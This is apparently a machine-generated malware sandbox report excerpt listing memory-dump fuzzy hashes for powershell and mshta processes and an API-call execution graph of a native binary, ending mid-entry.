                                                                                                                                                                                                                                                              • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                                                                                                                                                              • API String ID: 0-4077390204
                                                                                                                                                                                                                                                              • Opcode ID: 3983dbb1e5b8867a63ce7a7e03bb572dc0824c86393600d8af9704b84818bfab
                                                                                                                                                                                                                                                              • Instruction ID: 40588b214f8faf9bbcff71d64fc98ec5a1ffa0fb491076cd7483965532a3d0d9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3983dbb1e5b8867a63ce7a7e03bb572dc0824c86393600d8af9704b84818bfab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C431A7B380D7C79FDB52DA295CA90DD7FF0EF12288B0901F6C898CE197FE6459568201
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                                                                                              • API String ID: 0-4267328068
                                                                                                                                                                                                                                                              • Opcode ID: 27a61c601c2f726b43eb6e9385ab40fa402ab6daad248b1dc8c8eb5be4a70542
                                                                                                                                                                                                                                                              • Instruction ID: 9748341b4074419c7b874d96d0f9845c9f8e5d5a9dbc61805678bc40a11479a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27a61c601c2f726b43eb6e9385ab40fa402ab6daad248b1dc8c8eb5be4a70542
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED51A7B290E7C39FE746D6294866159BFB1FF52398B0901F7C0888F893FE5918578712
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2084276233.0000011A40230000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000011A40230000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_11a40230000_mshta.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                              • Instruction ID: 7c48de83e7ec3285f8f8eb13d6a91317641ae2873f771abfaea330f59c6e3639
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 439002244D640656D42811A10D952DC54406788250FD84481461690988D8BD02962163
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000044.00000002.2354907303.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ab42cb9a05f5e7dce7d7ba0ad9d7d22999539bac6aa7594106c1cbc9d95dc3da
                                                                                                                                                                                                                                                              • Instruction ID: 15759f2d94ce8c6ee4f03b93ca63356f43b777f1a27179fbf653530b12537ff5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab42cb9a05f5e7dce7d7ba0ad9d7d22999539bac6aa7594106c1cbc9d95dc3da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3326831E0DBD99FEB5AA73858601B97BE2EF67250B1801FBC14CC7197EA18AC05C752
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000044.00000002.2354179055.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2491fe07845c2a3ab86427b234118cdeaa53a5333b3c6055f289c3b4684c645f
                                                                                                                                                                                                                                                              • Instruction ID: 10b6bbc32e694c544e947b6c01f9fe020ba6f6baa05a7a1b8e5514e873d7bd37
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2491fe07845c2a3ab86427b234118cdeaa53a5333b3c6055f289c3b4684c645f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB61D571E0CA4C8FDB45EB6CD8556ADBBF1EF4A310F1441AED009DB292DE35A802CB80
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000044.00000002.2354907303.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6126abdebfa7187f47c42e69876a39f5c28c222458737bf564c19a23522b8a85
                                                                                                                                                                                                                                                              • Instruction ID: 0c841021faef3f727b48c0943c1cdad2f6fca451addfacccfae004cb53392571
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6126abdebfa7187f47c42e69876a39f5c28c222458737bf564c19a23522b8a85
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE413832E1CB959FEB5AA728485117D3BE2EFA7250B1900FBC14DC7197EE19AC06C742
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000044.00000002.2354179055.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                              • Instruction ID: b83def9539666f2da710551e04baa95c2c31cb8b3f6379e9650b0b804a7e0f67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D736E881CB45

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                                                              Total number of Nodes:1213
                                                                                                                                                                                                                                                              Total number of Limit Nodes:37
                                                                                                                                                                                                                                                              execution_graph 38258 7ff6185c3e71 38259 7ff6185c3e81 38258->38259 38260 7ff6185c3e89 38258->38260 38259->38260 38269 7ff618619a14 49 API calls 38259->38269 38262 7ff6185c3edd 38260->38262 38263 7ff6185c3ea3 38260->38263 38272 7ff61861a610 38262->38272 38270 7ff6185e331c 48 API calls 2 library calls 38263->38270 38266 7ff6185c3eab 38266->38262 38271 7ff6185c63e8 8 API calls 2 library calls 38266->38271 38269->38260 38270->38266 38271->38262 38273 7ff61861a61a 38272->38273 38274 7ff6185c3eef 38273->38274 38275 7ff61861a6a0 IsProcessorFeaturePresent 38273->38275 38276 7ff61861a6b7 38275->38276 38281 7ff61861a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38276->38281 38278 7ff61861a6ca 38282 7ff61861a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38278->38282 38281->38278 38283 7ff6185c1884 38415 7ff6185f34e4 38283->38415 38286 7ff6185f34e4 CompareStringW 38288 7ff6185c18a6 38286->38288 38287 7ff6185c1926 38289 7ff6185c195b 38287->38289 38479 7ff6185f3f98 63 API calls 2 library calls 38287->38479 38291 7ff6185f34e4 CompareStringW 38288->38291 38296 7ff6185c18b9 38288->38296 38297 7ff6185c1970 38289->38297 38480 7ff6185e2ed8 100 API calls 3 library calls 38289->38480 38291->38296 38294 7ff6185c1915 38478 7ff6185dca40 61 API calls _CxxThrowException 38294->38478 38296->38287 38477 7ff6185c1168 8 API calls 2 library calls 38296->38477 38298 7ff6185c19b8 38297->38298 38481 7ff6186049f4 48 API calls 38297->38481 38419 7ff6185c5450 38298->38419 38300 7ff6185c19b0 38482 7ff6185d8444 54 API calls fflush 38300->38482 38306 7ff6185c72c4 76 API calls 38313 7ff6185c1a12 38306->38313 38307 7ff6185c1b04 38457 7ff6185d6c94 38307->38457 38308 7ff6185c1ae6 38453 7ff6185c7514 38308->38453 38311 7ff6185c1af2 38312 7ff6185c7514 72 API calls 38311->38312 38314 7ff6185c1aff 38312->38314 38313->38307 38313->38308 38315 7ff61861a610 _handle_error 8 API calls 38314->38315 38316 7ff6185c2f97 38315->38316 38317 7ff6185c1b13 38473 7ff6185c7148 38317->38473 38319 7ff6185c1c71 38320 7ff6185c1ca7 38319->38320 38321 7ff6185c63e8 8 API calls 38319->38321 38322 7ff6185c1cd5 38320->38322 38323 7ff6185c1ce4 38320->38323 38324 7ff6185c1c91 38321->38324 38327 7ff61861a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38322->38327 38325 7ff61861a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38323->38325 38326 7ff6185c49b8 99 API calls 38324->38326 38331 7ff6185c1cee 38325->38331 38328 7ff6185c1c9d 38326->38328 38327->38331 38329 7ff6185c63e8 8 API calls 38328->38329 38329->38320 38330 7ff6185c1d50 38333 7ff61861a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38330->38333 38331->38330 38332 7ff61860de30 72 API calls 38331->38332 38332->38330 38334 7ff6185c1d62 38333->38334 38335 7ff61860dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38334->38335 38336 7ff6185c1d7b 38334->38336 38335->38336 38337 7ff618612bcc 66 API calls 38336->38337 38338 7ff6185c1dba 38337->38338 38411 7ff6185eae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38338->38411 38339 7ff6185c1e1c 38341 7ff6185c10c0 8 API calls 38339->38341 38343 7ff6185c1e5d 38339->38343 38340 7ff6185c1dde std::bad_alloc::bad_alloc 38340->38339 38342 7ff61861ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38340->38342 38341->38343 38342->38339 38344 7ff6185ca410 159 API calls 38343->38344 38409 7ff6185c1ef4 38343->38409 38344->38409 38345 7ff6185c2ccc 38346 7ff6185c2d0c 38345->38346 38410 7ff6185e8c80 72 API calls 38345->38410 38347 7ff61860de30 72 API calls 38346->38347 38348 7ff6185c2d21 38346->38348 38347->38348 38349 7ff6185c2d86 38348->38349 38359 7ff6186049f4 48 API calls 38348->38359 38357 7ff6186049f4 48 API calls 38349->38357 38390 7ff6185c2dd0 38349->38390 38350 7ff6186049f4 48 API calls 38352 7ff6185c2005 38350->38352 38351 7ff6185e6688 48 API calls 38351->38409 38352->38350 38353 7ff6185d8444 54 API calls 38352->38353 38354 7ff6185c5e70 169 API calls 38352->38354 38360 7ff6185c5928 237 API calls 38352->38360 38368 7ff6185de21c 63 API calls 38352->38368 38386 7ff6185cb540 147 API calls 38352->38386 38406 7ff61860b6d0 73 API calls 38352->38406 38352->38409 38353->38352 38354->38352 38355 7ff6185c80e4 192 API calls 38355->38390 38356 7ff6185ca504 208 API calls 38356->38390 38358 7ff6185c2d9e 38357->38358 38361 7ff6185d8444 54 API calls 38358->38361 38363 7ff6185c2d6c 38359->38363 38360->38352 38365 7ff6185c2da6 38361->38365 38362 7ff6185e7c7c 127 API calls 38362->38390 38366 7ff6186049f4 48 API calls 38363->38366 38364 7ff6185ca410 159 API calls 38364->38409 38374 7ff6185e1c24 12 API calls 38365->38374 38371 7ff6185c2d79 38366->38371 38367 7ff6185ce6c8 157 API calls 38367->38409 38368->38352 38369 7ff6185c1168 8 API calls 38369->38390 38370 7ff6185cb540 147 API calls 38370->38409 38372 7ff6185d8444 54 API calls 38371->38372 38372->38349 38373 7ff6185e65b4 48 API calls 38373->38409 38374->38390 38375 7ff6185e4554 16 API calls 38375->38409 38376 7ff6185e18ac 15 API calls 38376->38409 38377 7ff6185e1998 138 API calls 38377->38409 38378 7ff61860ae50 71 API calls 38381 7ff6185c2e39 38378->38381 38379 7ff6185c33b4 64 API calls 38379->38390 38380 7ff6185c5db4 46 API calls 38380->38409 38381->38378 38382 7ff6185dca40 61 API calls 38381->38382 38381->38390 38382->38390 38383 7ff6185c6188 231 API calls 38383->38390 38384 7ff6185e1930 11 API calls 38384->38409 38385 7ff6185c3f74 138 API calls 38385->38390 38386->38352 38387 7ff6185e7c7c 127 API calls 38387->38409 38388 7ff6186049f4 48 API calls 38388->38390 38389 7ff6185fba9c 195 API calls 38389->38390 38390->38355 38390->38356 38390->38362 38390->38369 38390->38379 38390->38381 38390->38383 38390->38385 38390->38388 38390->38389 38393 7ff6185d8444 54 API calls 38390->38393 38391 7ff6185c5004 49 API calls 38391->38409 38392 7ff6185e1e80 15 API calls 38392->38409 38393->38390 38394 7ff6185ca4d0 12 API calls 38394->38409 38395 7ff6185c571c 12 API calls 38395->38409 38396 7ff6185c1168 8 API calls 38396->38409 38397 7ff61860d48c 58 API calls 38397->38409 38398 7ff6185c5e70 169 API calls 38398->38409 38399 7ff6185d9be0 14 API calls 38399->38409 38400 7ff61860c0a8 10 API calls 38400->38409 38401 7ff6185e6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38401->38409 38402 7ff6185f97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38402->38409 38403 7ff6185dcbd0 75 API calls 38403->38409 38404 7ff6185e5c0c 237 API calls 38404->38409 38405 7ff6185e5d40 237 API calls 38405->38409 38406->38352 38407 7ff6185c6114 216 API calls 38407->38409 38408 7ff6185e5708 237 API calls 38408->38409 38409->38345 38409->38351 38409->38352 38409->38364 38409->38367 38409->38370 38409->38373 38409->38375 38409->38376 38409->38377 38409->38380 38409->38384 38409->38387 38409->38391 38409->38392 38409->38394 38409->38395 38409->38396 38409->38397 38409->38398 38409->38399 38409->38400 38409->38401 38409->38402 38409->38403 38409->38404 38409->38405 38409->38407 38409->38408 38412 7ff6185ea250 237 API calls 38409->38412 38413 7ff6185eaae0 237 API calls 38409->38413 38414 7ff6185d0d60 237 API calls 38409->38414 38410->38346 38411->38340 38412->38409 38413->38352 38414->38352 38416 7ff6185f34f6 38415->38416 38417 7ff6185c1893 38416->38417 38483 7ff61860dac0 CompareStringW 38416->38483 38417->38286 38417->38296 38422 7ff6185c546f setbuf 38419->38422 38420 7ff6185c554a memcpy_s 38524 7ff61860c0a8 GetSystemTime SystemTimeToFileTime 38420->38524 38422->38420 38437 7ff6185c5588 memcpy_s 38422->38437 38423 7ff6185c5583 38513 7ff6185c6eb8 38423->38513 38428 7ff6185c681c 54 API calls 38428->38423 38429 7ff6185c56e9 38520 7ff618606f68 38429->38520 38431 7ff6185c56f6 38432 7ff61861a610 _handle_error 8 API calls 38431->38432 38433 7ff6185c19df 38432->38433 38439 7ff6185c72c4 38433->38439 38437->38423 38484 7ff6185c3210 38437->38484 38490 7ff6185d7088 38437->38490 38494 7ff6185c681c 38437->38494 38505 7ff618607a24 38437->38505 38527 7ff6185c571c 38437->38527 38535 7ff6185d4380 14 API calls 38437->38535 38440 7ff6185c72eb 38439->38440 38675 7ff6185d88dc 38440->38675 38442 7ff6185c7302 38679 7ff6185f915c 38442->38679 38444 7ff6185c730f 38691 7ff6185f7044 38444->38691 38447 7ff61861a444 new 4 API calls 38448 7ff6185c73e3 38447->38448 38450 7ff6185c73f5 memcpy_s 38448->38450 38707 7ff6185e894c 38448->38707 38696 7ff6185d9be0 38450->38696 38454 7ff6185c7539 38453->38454 38800 7ff6185f922c 38454->38800 38458 7ff6185d6d45 38457->38458 38459 7ff6185d6cbc 38457->38459 38460 7ff6185d6d83 38458->38460 38463 7ff6185d6d69 38458->38463 38816 7ff6185f9f78 8 API calls 2 library calls 38458->38816 38461 7ff6185d6cd9 38459->38461 38811 7ff6185f9f78 8 API calls 2 library calls 38459->38811 38460->38317 38462 7ff6185d6cf3 38461->38462 38812 7ff6185f9f78 8 API calls 2 library calls 38461->38812 38466 7ff6185d6d0d 38462->38466 38813 7ff6185f9f78 8 API calls 2 library calls 38462->38813 38463->38460 38817 7ff6185f9f78 8 API calls 2 library calls 38463->38817 38470 7ff6185d6d2b 38466->38470 38814 7ff6185f9f78 8 API calls 2 library calls 38466->38814 38470->38460 38815 7ff6185f9f78 8 API calls 2 library calls 38470->38815 38474 7ff6185c7162 38473->38474 38475 7ff6185c7167 38473->38475 38818 7ff6185c6c64 130 API calls _handle_error 38474->38818 38477->38294 38478->38287 38479->38289 38480->38297 38481->38300 38482->38298 38483->38417 38485 7ff6185c32e9 38484->38485 38486 7ff6185c3231 38484->38486 38485->38437 38486->38485 38536 7ff6185d4380 14 API calls 38486->38536 38488 7ff6185c329c 38488->38485 38537 7ff6185e2a20 22 API calls 2 library calls 38488->38537 38491 7ff6185d70a4 38490->38491 38493 7ff6185d70c5 38491->38493 38538 7ff6185e8558 10 API calls 2 library calls 38491->38538 38493->38437 38539 7ff6185c6714 38494->38539 38496 7ff6185c6836 38497 7ff6185c6853 38496->38497 38550 7ff6186248c0 38496->38550 38497->38437 38500 7ff6185c68a9 std::bad_alloc::bad_alloc 38558 7ff61861ba34 RtlPcToFileHeader RaiseException 38500->38558 38502 7ff6185c68c4 38559 7ff6185c7188 12 API calls 38502->38559 38504 7ff6185c68eb 38504->38437 38509 7ff618607a59 38505->38509 38511 7ff618607a4f 38505->38511 38506 7ff618607a7c 38598 7ff61860b6d0 73 API calls _Init_thread_footer 38506->38598 38509->38506 38510 7ff618607b1c 60 API calls 38509->38510 38509->38511 38566 7ff6186071fc 38509->38566 38599 7ff6185d41b0 14 API calls 2 library calls 38509->38599 38510->38509 38511->38437 38514 7ff6185c6ee6 38513->38514 38519 7ff6185c6f5c 38513->38519 38664 7ff618609f64 8 API calls memcpy_s 38514->38664 38516 7ff6185c6efb 38517 7ff6185c6f2f 38516->38517 38516->38519 38517->38516 38665 7ff6185c7188 12 API calls 38517->38665 38519->38429 38521 7ff618606f8a 38520->38521 38522 7ff618606fb4 38520->38522 38521->38522 38523 7ff6185e4538 FindClose 38521->38523 38523->38521 38525 7ff61861a610 _handle_error 8 API calls 38524->38525 38526 7ff6185c5576 38525->38526 38526->38428 38528 7ff6185c5742 38527->38528 38532 7ff6185c575d 38527->38532 38528->38532 38670 7ff6185f3520 12 API calls 2 library calls 38528->38670 38666 7ff6185f3610 38532->38666 38533 7ff6185c57fc 38533->38437 38535->38437 38536->38488 38537->38485 38538->38491 38540 7ff6185c6738 38539->38540 38549 7ff6185c67a7 memcpy_s 38539->38549 38541 7ff6185c6765 38540->38541 38560 7ff6185dca6c 48 API calls 3 library calls 38540->38560 38545 7ff6185c67e1 38541->38545 38546 7ff6185c6786 38541->38546 38543 7ff6185c6759 38561 7ff6185dcb64 8 API calls 38543->38561 38545->38549 38563 7ff6185dcb64 8 API calls 38545->38563 38546->38549 38562 7ff6185dcb64 8 API calls 38546->38562 38549->38496 38551 7ff6185c684b 38550->38551 38552 7ff6186248f5 38550->38552 38551->38497 38551->38500 38552->38551 38564 7ff618627094 31 API calls 2 library calls 38552->38564 38554 7ff618624924 38554->38551 38555 7ff61862492d 38554->38555 38565 7ff618624e3c 16 API calls abort 38555->38565 38558->38502 38559->38504 38560->38543 38564->38554 38571 7ff618607217 setbuf 38566->38571 38567 7ff61861a610 _handle_error 8 API calls 38569 7ff61860776f 38567->38569 38569->38509 38582 7ff61860725a 38571->38582 38583 7ff61860729c 38571->38583 38594 7ff6186073c5 38571->38594 38613 7ff6185e4554 38571->38613 38572 7ff618607453 38575 7ff618607464 38572->38575 38576 7ff618607476 38572->38576 38574 7ff6186076ef 38574->38582 38624 7ff6185e8558 10 API calls 2 library calls 38574->38624 38621 7ff618607c38 55 API calls 3 library calls 38575->38621 38585 7ff618607496 38576->38585 38610 7ff6185e4538 38576->38610 38579 7ff618607342 38579->38574 38579->38582 38589 7ff618607656 38579->38589 38622 7ff6185d4380 14 API calls 38579->38622 38580 7ff618607471 38580->38576 38582->38567 38584 7ff6186073bb 38583->38584 38587 7ff61860732e 38583->38587 38600 7ff61861a444 38584->38600 38585->38582 38591 7ff6185e4554 16 API calls 38585->38591 38587->38579 38590 7ff61860734a 38587->38590 38589->38574 38589->38582 38596 7ff618607723 38589->38596 38590->38582 38595 7ff61860737e 38590->38595 38619 7ff6185d4380 14 API calls 38590->38619 38591->38582 38606 7ff6185e45cc 38594->38606 38595->38582 38620 7ff6185dcbd0 75 API calls 38595->38620 38623 7ff6185cc214 8 API calls 2 library calls 38596->38623 38599->38509 38603 7ff61861a44f 38600->38603 38601 7ff61861a47a 38601->38594 38603->38601 38625 7ff6186236c0 38603->38625 38628 7ff61861b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38603->38628 38629 7ff61861b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38603->38629 38609 7ff6185e45ed 38606->38609 38607 7ff6185e46b2 38607->38572 38607->38579 38608 7ff6185e46ec 15 API calls 38608->38609 38609->38607 38609->38608 38611 7ff6185e454f 38610->38611 38612 7ff6185e4549 FindClose 38610->38612 38611->38585 38612->38611 38614 7ff6185e4570 38613->38614 38618 7ff6185e4574 38614->38618 38636 7ff6185e46ec 38614->38636 38617 7ff6185e458d FindClose 38617->38618 38618->38583 38619->38595 38620->38582 38621->38580 38622->38589 38623->38582 38624->38582 38630 7ff618623700 38625->38630 38635 7ff618626938 EnterCriticalSection 38630->38635 38632 7ff61862370d 38633 7ff618626998 fflush LeaveCriticalSection 38632->38633 38634 7ff6186236d2 38633->38634 38634->38603 38637 7ff6185e4705 setbuf 38636->38637 38638 7ff6185e4733 FindFirstFileW 38637->38638 38639 7ff6185e47a4 FindNextFileW 38637->38639 38640 7ff6185e478b 38638->38640 38642 7ff6185e4749 38638->38642 38639->38640 38641 7ff6185e47ae GetLastError 38639->38641 38645 7ff61861a610 _handle_error 8 API calls 38640->38645 38641->38640 38649 7ff6185f4534 38642->38649 38648 7ff6185e4587 38645->38648 38646 7ff6185e475f FindFirstFileW 38646->38640 38647 7ff6185e477a GetLastError 38646->38647 38647->38640 38648->38617 38648->38618 38650 7ff6185f4549 setbuf 38649->38650 38660 7ff6185f45a2 38650->38660 38661 7ff6185f472c CharUpperW 38650->38661 38652 7ff6185f4579 38662 7ff6185f4760 CharUpperW 38652->38662 38653 7ff61861a610 _handle_error 8 API calls 38654 7ff6185e475b 38653->38654 38654->38646 38654->38647 38656 7ff6185f4592 38657 7ff6185f459a 38656->38657 38658 7ff6185f4629 GetCurrentDirectoryW 38656->38658 38663 7ff6185f472c CharUpperW 38657->38663 38658->38660 38660->38653 38661->38652 38662->38656 38663->38660 38664->38516 38665->38517 38669 7ff6185f3626 setbuf wcschr 38666->38669 38667 7ff61861a610 _handle_error 8 API calls 38668 7ff6185c57e1 38667->38668 38668->38533 38671 7ff6185f48bc 38668->38671 38669->38667 38670->38532 38672 7ff6185f48cb setbuf 38671->38672 38673 7ff61861a610 _handle_error 8 API calls 38672->38673 38674 7ff6185f493a 38673->38674 38674->38533 38676 7ff6185d8919 38675->38676 38712 7ff618604b14 38676->38712 38678 7ff6185d8954 memcpy_s 38678->38442 38680 7ff6185f9199 38679->38680 38717 7ff61861a480 38680->38717 38683 7ff61861a444 new 4 API calls 38684 7ff6185f91cf 38683->38684 38685 7ff6185f91e1 38684->38685 38686 7ff6185d88dc 8 API calls 38684->38686 38687 7ff61861a444 new 4 API calls 38685->38687 38686->38685 38688 7ff6185f91f7 38687->38688 38689 7ff6185f9209 38688->38689 38690 7ff6185d88dc 8 API calls 38688->38690 38689->38444 38690->38689 38692 7ff6185d88dc 8 API calls 38691->38692 38693 7ff6185f7063 38692->38693 38725 7ff6185f72c0 38693->38725 38729 7ff6185d901c CryptAcquireContextW 38696->38729 38700 7ff6185d9c2a 38739 7ff618609ce4 38700->38739 38704 7ff6185d9c5b memcpy_s 38705 7ff61861a610 _handle_error 8 API calls 38704->38705 38706 7ff6185c1a01 38705->38706 38706->38306 38756 7ff618607d80 38707->38756 38713 7ff618604b2b 38712->38713 38714 7ff618604b26 38712->38714 38713->38678 38716 7ff618604b38 8 API calls _handle_error 38714->38716 38716->38713 38722 7ff61861a444 38717->38722 38718 7ff6185f91be 38718->38683 38719 7ff6186236c0 new 2 API calls 38719->38722 38722->38718 38722->38719 38723 7ff61861b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38722->38723 38724 7ff61861b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38722->38724 38726 7ff6185f72dd 38725->38726 38727 7ff6185c7325 38726->38727 38728 7ff61861a480 4 API calls 38726->38728 38727->38447 38727->38450 38728->38727 38730 7ff6185d907e 38729->38730 38731 7ff6185d9057 CryptGenRandom CryptReleaseContext 38729->38731 38733 7ff6185d9c9c 11 API calls 38730->38733 38731->38730 38732 7ff6185d9089 38731->38732 38734 7ff6185d9c9c 38732->38734 38733->38732 38735 7ff61860c0a8 10 API calls 38734->38735 38736 7ff6185d9cc5 38735->38736 38749 7ff618622d74 38736->38749 38740 7ff6185d9c49 38739->38740 38741 7ff618609d15 memcpy_s 38739->38741 38743 7ff618609b70 38740->38743 38741->38740 38752 7ff618609d74 38741->38752 38746 7ff618609bad memcpy_s 38743->38746 38747 7ff618609bd9 memcpy_s 38743->38747 38744 7ff618609d74 8 API calls 38745 7ff618609c07 38744->38745 38745->38704 38746->38747 38748 7ff618609d74 8 API calls 38746->38748 38747->38744 38748->38747 38750 7ff6185d9cd7 38749->38750 38751 7ff618622d8b QueryPerformanceCounter 38749->38751 38750->38700 38751->38750 38753 7ff618609dbc 38752->38753 38753->38753 38754 7ff61861a610 _handle_error 8 API calls 38753->38754 38755 7ff618609f40 38754->38755 38755->38741 38763 7ff618608094 38756->38763 38759 7ff6185e8a44 38760 7ff6185e8a5a memcpy_s 38759->38760 38795 7ff61860bac4 38760->38795 38764 7ff61860809f 38763->38764 38767 7ff618607ec8 38764->38767 38768 7ff618607efa memcpy_s 38767->38768 38773 7ff618607fb5 38768->38773 38781 7ff61860b3f0 38768->38781 38771 7ff61860805c GetCurrentProcessId 38772 7ff6185e896e 38771->38772 38772->38759 38773->38771 38775 7ff618607ff1 38773->38775 38774 7ff618607f7e GetProcAddressForCaller GetProcAddress 38774->38773 38775->38772 38790 7ff6185dca6c 48 API calls 3 library calls 38775->38790 38777 7ff61860801f 38791 7ff6185dcda4 10 API calls 2 library calls 38777->38791 38779 7ff618608027 38792 7ff6185dca40 61 API calls _CxxThrowException 38779->38792 38793 7ff61861a5a0 38781->38793 38784 7ff61860b428 38788 7ff61861a610 _handle_error 8 API calls 38784->38788 38785 7ff61860b42c 38786 7ff6185f48bc 8 API calls 38785->38786 38787 7ff61860b444 LoadLibraryExW 38786->38787 38787->38784 38789 7ff618607f72 38788->38789 38789->38773 38789->38774 38790->38777 38791->38779 38792->38772 38794 7ff61860b3fc GetSystemDirectoryW 38793->38794 38794->38784 38794->38785 38798 7ff61860ba70 GetCurrentProcess GetProcessAffinityMask 38795->38798 38799 7ff6185e89c5 38798->38799 38799->38450 38801 7ff6185f9245 38800->38801 38808 7ff6185e6194 72 API calls 38801->38808 38803 7ff6185f92b1 38809 7ff6185e6194 72 API calls 38803->38809 38805 7ff6185f92bd 38810 7ff6185e6194 72 API calls 38805->38810 38807 7ff6185f92c9 38808->38803 38809->38805 38810->38807 38811->38461 38812->38462 38813->38466 38814->38470 38815->38458 38816->38463 38817->38460 38818->38475 38819 7ff6185c3b53 38820 7ff6185c3b64 38819->38820 38870 7ff6185e1e80 38820->38870 38821 7ff6185c3c09 38882 7ff6185e23f0 38821->38882 38823 7ff6185c3c18 38892 7ff6185c8050 157 API calls 38823->38892 38824 7ff6185c3bb6 38824->38821 38824->38823 38827 7ff6185c3c01 38824->38827 38826 7ff6185c3c90 38909 7ff61860d400 48 API calls 38826->38909 38887 7ff6185e1c24 38827->38887 38828 7ff6185c3c3d 38893 7ff6185c8010 13 API calls 38828->38893 38831 7ff6185c3ccc 38831->38826 38900 7ff6185e2414 61 API 